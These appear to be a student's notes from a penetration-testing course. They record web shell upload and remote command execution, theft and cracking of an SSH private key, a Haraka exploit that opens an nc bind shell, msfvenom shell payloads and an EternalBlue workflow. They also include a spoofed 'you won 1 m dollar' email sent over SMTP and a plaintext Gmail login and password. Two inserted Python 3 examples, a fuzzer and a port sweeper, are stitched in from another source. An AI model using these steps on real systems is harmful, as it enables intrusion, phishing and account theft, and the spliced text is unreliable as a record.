PC137425
07.01.2019

buffer overflow?? a characteristic of the "C" language

    import socket

    # Python 2: open a TCP connection to the local SMTP service and exchange one command
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("127.0.0.1", 25))
    s.recv(1024)
    s.send("ehlo google.com\r\n")
    s.recv(1024)

required: Win7 fresh install, Immunity Debugger

what we expect to do in this module:
- simple exploit
- advanced exploit
- take an existing exploit for XP and port it to Win7 or Win10

=================

nmap 172.16.65.1 -p 80
nmap 172.16.65.0/24 -p 80 --open
found 172.16.65.132

download simple-backdoor.php:
/usr/share/webshells/php# ls
cd Desktop
# cat simple-backdoor.php
mv simple-backdoor.php tv.php
upload it to 172.16.65.132

curl http://172.16.65.132/jQuery/server/php/files/tv.php\?cmd\=cat+/etc/passwd
## gives us the list of users on that system

==========================

nano exploit_jquery.py

    import requests

    # Python 2: interactive loop, each command is passed to the uploaded web shell via ?cmd=
    while True:
        cmd = raw_input("> ")
        r = requests.get("http://172.16.65.132/jQuery/server/php/files/tv.php?cmd={}".format(cmd))
        print r.text

python exploit_jquery.py

==========================

cat /etc/passwd
ls /home/hot                        ## csf.zip found
ls -al /home/hot/csf.zip            ## check permissions
ls -al /home/hot                    ## list the files in that directory
ls -al /home/hot/.ssh/              ## the backup file has rwx permissions
cat /home/hot/.ssh/backup           ## private key found
copy the private key to id_rs.key
ssh -i id_rs.key hot@172.16.65.132
## Load key "id_rs.key": bad permissions
chmod 600 id_rs.key
ssh -i id_rs.key hot@172.16.65.132
## the key is encrypted, brute force required
## prepare rockyou.txt; john to be used
/usr/sbin/ssh2john
ssh2john /root/Desktop/id_rs.key > /Desktop/hash_id
cat hash_id
john hash_id --wordlist=rockyou.txt
## passphrase found: "mustang1"
ssh hot@172.16.65.132
$ cp csf.zip /var/www/html
$ unzip csf.zip
cd csf
see the port-knocking procedure; found port 29
searchsploit haraka
/usr/share/exploitdb/exploits/linux/remote/41162.py
cp 41162.py /home/dardan/Desktop/41162.py
nano 41162.py                       ## the SMTP port has to be modified
python 41162.py -c "nc -lvp 995 -e /bin/bash" -t root@haraka.test -m 172.16.65.132
nc 172.16.65.132 995
id
python -c "import pty; pty.spawn('/bin/bash')"
=============================================================================================
=============================================================================================
09.01.2019

3 folders to be created: apps, explicit-Dev, exploits

what will be taught:
smash the stack (means doing a buffer overflow)
on the stack, variables, functions, ... are stored
patterns?? a non-repeating sequence sent as input, so that the bytes that end up in a register identify their position in the input
offset?? the distance from the start of the input to the bytes that land in EIP
structure of an exploit (vuln. assessment)??

run a service, scan the IP that runs that service:
nmap 172.16.60.x -p10000
e.g. telnet 172.16.60.x 10000
hello          ## send data, the reply comes back on the screen; in the service you see the logs

functions get/put
get      # has to declare how many bytes it accepts (1 byte = one character)
         if you put 13 bytes in... this means we are causing an overflow, so the vuln. is in the put function
fuzzing  # e.g. we send 10 bytes, then 10 more, then 10 more, until it crashes;
         Immunity Debugger shows in memory how many bytes are being sent

BufferOverflow/exploits
-----------------------------------------
nano exploit_1.py

    import socket
    import sys

    # Python 2: connect to the service on port 10000, send one line, print the reply
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1], 10000))
    s.send("hello\r\n")
    data = s.recv(1024)
    print data
    s.close()

python exploit_1.py 172.16.60.x
--------------------------------------
EIP? find how many A's are needed:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <length>      ## generate the pattern
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 6a413969      ## offset of the value seen in EIP
ESP? in Immunity Debugger: Ctrl+F, JMP ESP
nano exploit_2.py
demo in Immunity Debugger: generate a pattern and hit the target with the pattern instead of e.g. AAAA...
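Added worked example for the fuzz, pattern and offset steps above (this is not code from the course or its instructor). A local stand-in service with a constructed stack layout (264-byte buffer, then saved EBP, then the return address at offset 268) is fuzzed in 10-byte steps until it stops answering, then hit with a Metasploit-style cyclic pattern; the value the service records in its fake return address is the same 6a413969 the notes query, and the offset comes out as 268. The mock service, its layout and the loopback port are assumptions; on a real target the EIP value is read from Immunity Debugger instead. Python 3.

```python
"""Fuzz a mock service until it crashes, then locate the EIP offset with a cyclic pattern."""
import socket
import struct
import threading

# Constructed stack layout of the fake vulnerable service (assumption, not a real target):
# a 264-byte buffer, then the saved EBP (4 bytes), then the saved return address at 268.
BUF_SIZE = 264
EIP_OFFSET = BUF_SIZE + 4


class MockService(threading.Thread):
    """Stand-in for the port-10000 target: copies the request into the fixed buffer
    with no length check. Writing past offset 268 "crashes" it (the connection is
    dropped with no reply) and records what landed in EIP, which is what Immunity
    Debugger would show on the real target."""

    def __init__(self):
        super().__init__(daemon=True)
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(("127.0.0.1", 0))            # any free loopback port
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        self.eip = None                              # value "in EIP" after the last crash

    def run(self):
        while True:                                  # keeps serving, like restarting the app in the debugger
            conn, _ = self.sock.accept()
            with conn:
                conn.sendall(b"220 mock service ready\r\n")
                payload = self._read_line(conn)
                if len(payload) > EIP_OFFSET:
                    # unbounded copy: input bytes 268..271 overwrite the return address
                    ret = (payload[EIP_OFFSET:EIP_OFFSET + 4] + b"\x00" * 4)[:4]
                    self.eip = struct.unpack("<I", ret)[0]   # x86 reads it little-endian
                    continue                                 # "crash": close without answering
                conn.sendall(b"250 OK\r\n")

    @staticmethod
    def _read_line(conn):
        data = b""
        while not data.endswith(b"\r\n"):
            chunk = conn.recv(4096)
            if not chunk:
                break
            data += chunk
        return data.rstrip(b"\r\n")


def send_request(port, payload):
    """One round trip like exploit_1.py: connect, read banner, send, read reply."""
    s = socket.create_connection(("127.0.0.1", port), timeout=3)
    try:
        s.recv(1024)                                 # banner
        s.sendall(payload + b"\r\n")
        try:
            return s.recv(1024)                      # b"" means the peer died
        except (ConnectionResetError, socket.timeout):
            return b""
    finally:
        s.close()


def fuzz(port, step=10, limit=5000):
    """Send 'A'*step, 'A'*2*step, ... until the service stops answering; returns that length."""
    for n in range(step, limit + 1, step):
        if not send_request(port, b"A" * n):
            return n
    return None


def pattern_create(length):
    """pattern_create.rb equivalent: Aa0Aa1...Aa9Ab0...; every 4-byte window is unique
    for the first 20280 bytes, so the bytes found in EIP identify their position."""
    out = bytearray()
    for upper in b"ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for lower in b"abcdefghijklmnopqrstuvwxyz":
            for digit in b"0123456789":
                out += bytes((upper, lower, digit))
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_value, length=20280):
    """pattern_offset.rb -q equivalent: EIP holds 4 pattern bytes read little-endian,
    so 0x6a413969 is the substring b'i9Aj'."""
    return pattern_create(length).find(struct.pack("<I", eip_value))


def run_demo():
    svc = MockService()
    svc.start()
    crash_len = fuzz(svc.port)                                # first length that kills the service
    send_request(svc.port, pattern_create(crash_len + 100))   # overshoot with the pattern
    eip = svc.eip                                             # what the debugger would display
    return crash_len, "%08x" % eip, pattern_offset(eip)


if __name__ == "__main__":
    crash_len, eip_hex, offset = run_demo()
    print("service died at %d bytes, EIP=%s, offset to EIP=%d" % (crash_len, eip_hex, offset))
```

The fuzzer treats "no reply" as the crash signal; on a real target confirm it in the debugger, because a service can also stop answering for reasons unrelated to memory corruption (input rejected and connection dropped). The pattern length should exceed the crash length by a margin so the overwrite of EIP is complete, otherwise only part of the register holds pattern bytes and the offset lookup fails.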
communicate with the application, crash the app, find how many bytes it takes to crash it
msfvenom -p windows/shell_bind_tcp LPORT=4444 -f c -b "\x00"
kernel32.dll
=============================================================================================
=============================================================================================
14.01.2019

Objectives
Target: 172.16.65.138
Objective: on port 21, suspected to be vulnerable. The exploit for that service is for WinXP; now the service is running on Win7. The task is to modify it for Win7.
Target: hack 172.16.65.138
Stage 2: add a vuln scanner to this PoC with the netaddr library (the network function)
dardan@kali:~/Desktop/exploits/exploits$ python vull.py 172.16.60.75
Stage 3: do it with multithreading
=============================================================================================
=============================================================================================
16.01.2019

fuzzing, identifying break points
identifying limits (memory, disk)
To identify the break point:

nano smtp.py

    import socket
    import sys

    # Python 2: connect to the SMTP service, read the banner, disconnect
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1], 25))
    data = s.recv(1024)
    s.close()

----------------------------------

    import socket
    import sys

    # send "mail from:" with a growing argument until the server rejects it with a 553
    for i in range(1, 1000):
        c = "A" * i
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], 25))
        data = s.recv(1024)
        s.send("ehlo google.com\r\n")
        data = s.recv(1024)
        s.send("mail from:{}\r\n".format(c))
        data = s.recv(1024)
        if "553" in data:
            print("Limit is {}".format(i))
            break
        s.close()

python smtp.py 127.0.0.1
----------------------------

    import socket
    import sys

    # same loop for "rcpt to:"
    for i in range(1, 1000):
        c = "A" * i
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], 25))
        data = s.recv(1024)
        s.send("ehlo google.com\r\n")
        data = s.recv(1024)
        s.send("mail from:a\r\n")
        data = s.recv(1024)
        s.send("rcpt to:{}\r\n".format(c))
        data = s.recv(1024)
        if "553 5.1.0" in data:
            print("Limit is {}".format(i))
            break
        s.close()

python smtp.py 127.0.0.1
## a 553 reply means the server rejected the argument by a length/syntax check; that is the input limit,
## not a crash. A candidate for memory corruption is a request that gets no reply at all.
----------------------------
sudo apt-get install mailutils
sudo apt-get install sendmail
telnet 127.0.0.1 25
ehlo google.com
-----------------------------------------------
nmap 127.0.0.1 -p25
telnet 127.0.0.1 25
ehlo google.com
mail from:bill@microsoft.com
rcpt to:tima@for4mail.com
data
hello
from:bill@microsoft.com
hi this is bill gates, you won 1 m dollar.
Kind Regards
Bill
.
quit
-----------------------------------------------
google search: allow less secure apps, off to ON
google search: pop commands
openssl s_client -connect pop.gmail.com:995
USER habibihabib73@gmail.com
PASS cyber123456
=============================================================================================
18.01.2019

pycharm
create new project
create new file test.py
create new file mail_client.py
create new file server_manager.py
create new file email_manager.py
=============================================================================================
=============================================================================================
23.01.2019
...
(file names are those of the worawit MS17-010 repository)
sudo nasm -f bin eternalblue_kshellcode_x64.asm
ls
cat eternalblue_sc_merge.py
tool: tmux
nmap -p 445 172.16.60.94 --script smb-vuln-ms17-010
exploit -j -z
jobs -k 0
cd shellcode
/remove
nano eternalblue_sc_merge.py
/copy msfvenom
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=172.16.60.94 LPORT=xxxxx
## LHOST is the attacker's listener address, not the target
set EXITFUNC thread
exploit -j -v
python eternalblue_exploit7.py 182.16.x.x shellcode/....
turn exploit7 into a library; scan the whole subnet for EternalBlue, exploit, payload
mkdir EB
nano main.py    ## only whether port 445 is open; app to scan an IP range
=============================================================================================
=============================================================================================
26.01.2019
...
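Added example for the stage 2 / stage 3 work of 14.01 (scan an IP range from vull.py with a network library, then multithread it) and the 23.01 port-445 range check before the EternalBlue sweep. This is not the course's vull.py or main.py; it uses the standard-library ipaddress module instead of netaddr (netaddr's IPNetwork(cidr).iter_hosts() does the same job) and a thread pool for the connect scan. The loopback listener and the sample ranges are constructed for the demo. Python 3.

```python
"""Multithreaded TCP connect sweep of an IP range (e.g. port 445 or 21 across a /24)."""
import ipaddress
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def expand_targets(cidr, port):
    """Stage 2: turn '172.16.60.0/24' into (host, port) pairs.
    Assumption: stdlib ipaddress stands in for the netaddr library named in the notes."""
    return [(str(host), port) for host in ipaddress.ip_network(cidr, strict=False).hosts()]


def probe(target, timeout=1.0):
    """One TCP connect. 'open' = handshake completed, 'closed' = RST received,
    'filtered' = no answer within the timeout (typical of a firewall dropping SYNs)."""
    host, port = target
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return host, port, "open"
    except ConnectionRefusedError:
        return host, port, "closed"
    except (socket.timeout, OSError):
        return host, port, "filtered"


def sweep(targets, threads=64, timeout=1.0):
    """Stage 3: probe targets concurrently; returns {(host, port): state}.
    A connect scan is I/O-bound, so threads are enough: 64 workers with a 1 s timeout
    cover a /24 in a few seconds instead of roughly four minutes sequentially."""
    with ThreadPoolExecutor(max_workers=threads) as pool:
        results = list(pool.map(lambda t: probe(t, timeout), targets))
    return {(h, p): state for h, p, state in results}


def open_hosts(results):
    """Hosts worth handing to the exploit stage."""
    return sorted(h for (h, p), state in results.items() if state == "open")


def _accept_loop(srv):
    while True:
        conn, _ = srv.accept()
        conn.close()


def _local_listener():
    """Constructed fixture: one open port on loopback plus a port known to be closed."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    open_port = srv.getsockname()[1]
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()                          # nothing listens on it any more
    threading.Thread(target=_accept_loop, args=(srv,), daemon=True).start()
    return open_port, closed_port


def run_demo():
    open_port, closed_port = _local_listener()
    results = sweep([("127.0.0.1", open_port), ("127.0.0.1", closed_port)])
    return results[("127.0.0.1", open_port)], results[("127.0.0.1", closed_port)]


if __name__ == "__main__":
    print(expand_targets("172.16.60.0/30", 445))    # constructed range, two usable hosts
    print(run_demo())
    # real use: open_hosts(sweep(expand_targets("172.16.60.0/24", 445)))
```

Note that "open on 445" only says SMB is reachable; whether the host is actually MS17-010 vulnerable still needs the nmap smb-vuln-ms17-010 script or the exploit's own check, so the sweep is a pre-filter for the exploit stage, not a replacement for it.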
=============================================================================================
=============================================================================================
28.01.2019
bla bla
=============================================================================================
30.01.2019
I wasn't there
=============================================================================================
01.02.2019
I wasn't there
=============================================================================================
04.02.2019

pen test?
before a pen test:
- understanding OSes (not only Windows and Linux)
- services: the attack vector, the method of attack
red team - find the vulns
blue team - fix the vulns
purple team - mixed
pen test... means capture the flag
white box, black box, grey box